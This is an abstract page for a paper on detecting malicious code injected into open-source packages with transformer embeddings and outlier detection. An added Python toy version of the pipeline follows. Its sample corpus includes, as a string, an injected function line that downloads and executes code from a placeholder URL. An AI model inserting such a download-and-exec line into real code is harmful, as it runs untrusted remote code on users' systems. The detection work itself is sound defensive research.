Malicious Source Code Detection Using Transformer

09/16/2022
by Chen Tsfaty, et al.

Open source code is a common practice in modern software development. However, reusing code written by others gives bad actors a path to a wide community of developers and, through them, to the products that depend on that code. Such attacks are categorized as supply chain attacks. Recent years have seen a growing number of supply chain attacks that leverage open source during software development, relying on the download and installation procedures, whether automatic or manual. Over the years, many approaches have been devised for detecting vulnerable packages; detecting malicious code within packages, however, remains uncommon. Those detection approaches can be broadly categorized as analyses that execute the code (dynamic) and analyses that do not (static). Here, we introduce the Malicious Source code Detection using Transformers (MSDT) algorithm. MSDT is a novel static analysis based on a deep learning method that detects real-world cases of code injection into source code packages. In this study, we used MSDT and a dataset of over 600,000 different functions to embed the functions, applied a clustering algorithm to the resulting vectors, and detected the malicious functions by detecting the outliers. We evaluated MSDT's performance through extensive experiments and demonstrated that our algorithm is capable of detecting functions that were injected with malicious code with precision@k values of up to 0.909.
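The shape of the pipeline the abstract describes (embed each function, score functions that fall far from the dense groups, rank them, evaluate with precision@k), as an added toy example that is not the paper's code: the transformer encoder is replaced by a bag-of-tokens embedding, the clustering step by a mean nearest-neighbour distance score, and the corpus is a constructed handful of functions with one injected copy of `add` (all of these are assumptions, not details from the paper).

```python
"""Toy version of the MSDT pipeline shape: embed functions, score outliers, compute precision@k.
Constructed example: bag-of-tokens stands in for the transformer, nearest-neighbour distance
stands in for the clustering step, and the corpus below is made up for illustration."""
import re
from collections import Counter
from math import sqrt

# Constructed corpus: (name, source, is_injected). One copy of `add` carries an
# injected download-and-exec stub pointing at a non-resolvable placeholder URL.
CORPUS = [
    ("add", "def add(a, b):\n    return a + b", False),
    ("sub", "def sub(a, b):\n    return a - b", False),
    ("mul", "def mul(a, b):\n    return a * b", False),
    ("div", "def div(a, b):\n    if b == 0:\n        return 0\n    return a / b", False),
    ("mod", "def mod(a, b):\n    return a % b", False),
    ("max2", "def max2(a, b):\n    return a if a > b else b", False),
    ("add_injected",
     "def add(a, b):\n    import urllib.request\n"
     "    exec(urllib.request.urlopen('http://placeholder.invalid/x').read())\n"
     "    return a + b", True),
]

def embed(source, vocab):
    """Stand-in for the transformer encoder: L2-normalised token-count vector."""
    counts = Counter(re.findall(r"\w+", source))
    vec = [counts.get(tok, 0) for tok in vocab]
    norm = sqrt(sum(v * v for v in vec)) or 1.0
    return [v / norm for v in vec]

def distance(u, v):
    return sqrt(sum((x - y) ** 2 for x, y in zip(u, v)))

def outlier_scores(corpus, neighbours=2):
    """Score each function by its mean distance to its nearest neighbours:
    a function far from every dense group of similar functions is an outlier candidate."""
    vocab = sorted({t for _, src, _ in corpus for t in re.findall(r"\w+", src)})
    vecs = [embed(src, vocab) for _, src, _ in corpus]
    scores = {}
    for i, (name, _, _) in enumerate(corpus):
        dists = sorted(distance(vecs[i], vecs[j]) for j in range(len(vecs)) if j != i)
        scores[name] = sum(dists[:neighbours]) / neighbours
    return scores

def precision_at_k(scores, corpus, k):
    """Fraction of the k highest-scoring functions that are truly injected."""
    truth = {name: injected for name, _, injected in corpus}
    ranked = sorted(scores, key=scores.get, reverse=True)[:k]
    return sum(truth[name] for name in ranked) / k

if __name__ == "__main__":
    scores = outlier_scores(CORPUS)
    for name in sorted(scores, key=scores.get, reverse=True):
        print(f"{name:13s} {scores[name]:.3f}")
    print("precision@1 =", precision_at_k(scores, CORPUS, 1))
```

Note that `div` is longer than the injected function's benign twin yet scores well below it: the score reflects distance from the group of similar functions, not function length.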

